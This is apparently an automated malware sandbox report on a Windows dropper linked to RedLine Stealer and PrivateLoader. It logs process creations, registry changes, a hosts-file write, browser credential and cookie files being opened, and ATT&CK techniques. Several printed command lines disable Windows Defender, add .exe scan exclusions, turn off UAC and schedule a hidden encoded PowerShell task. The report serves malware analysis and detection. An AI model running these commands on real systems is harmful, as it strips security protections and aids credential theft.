Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6cf674f0,0x6cf67500,0x6cf6750c
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe "C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2284 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231121151234" --session-guid=0bda333d-4994-4b67-9b59-0f927372c94a --server-tracking-blob=ZDUxMWEyYzQyYmU3YjNmMDI3NzRlNWM2YTg1YzY1MzdlNGQ4ZGExMzhjNzg4MGQyMThiMzI4OGVlZWIyNTVmNDp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMDU3NTk0OS4yNzIzIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI5ZjZlMmVjMS0wNzBjLTRmYWEtODc4OS01ZWEyMjQ2NDhkMTUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7005000000000000
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c4774f0,0x6c477500,0x6c47750c
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gXUhwMAMn" /SC once /ST 08:40:27 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe "C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe"
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	Process created: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6b3d74f0,0x6b3d7500,0x6b3d750c
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: ..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
Source: OPqTdTFbxWlK6znimRD995XD.exe	Binary or memory string: Progman

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe

Code function: 32_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,

32_2_00414B04

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Registry key value created / modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B63B5C26-9D9A-45CD-9FC0-F449F4174656}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware 1
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Registry key value created / modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B63B5C26-9D9A-45CD-9FC0-F449F4174656}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableBehaviorMonitoring 1
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Registry key value created / modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B63B5C26-9D9A-45CD-9FC0-F449F4174656}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableOnAccessProtection 1
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Registry key value created / modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B63B5C26-9D9A-45CD-9FC0-F449F4174656}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableScanOnRealtimeEnable 1
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Registry key value created / modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B63B5C26-9D9A-45CD-9FC0-F449F4174656}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableRealtimeMonitoring 1
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Registry key value created / modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B63B5C26-9D9A-45CD-9FC0-F449F4174656}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Registry key value created / modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B63B5C26-9D9A-45CD-9FC0-F449F4174656}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableRawWriteNotification 1

Modifies Group Policy settings

Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Modifies the hosts file

Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe

File written: C:\Windows\System32\drivers\etc\hosts

Disables UAC (registry)

Source: C:\Users\user\Desktop\file.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match

File source: C:\Users\user\Pictures\Minor Policy\eoK_HtB8HzOnJQBreBydnt5f.exe, type: DROPPED

Yara detected PrivateLoader

Source: Yara match	File source: C:\Users\user\Pictures\Minor Policy\6CYB0iVk9rownSr74i6xHL6G.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\home[1].exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match

File source: C:\Users\user\Pictures\Minor Policy\eoK_HtB8HzOnJQBreBydnt5f.exe, type: DROPPED

Yara detected PrivateLoader

Source: Yara match	File source: C:\Users\user\Pictures\Minor Policy\6CYB0iVk9rownSr74i6xHL6G.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\home[1].exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	4 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	11 Scripting	1 Scheduled Task/Job	1 Bypass User Account Control	71 Disable or Modify Tools	1 Credential API Hooking	35 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	Junk Data	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	11 Native API	2 Registry Run Keys / Startup Folder	12 Process Injection	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Credential API Hooking	Automated Exfiltration	Steganography			Data Encrypted for Impact	DNS Server	Email Addresses
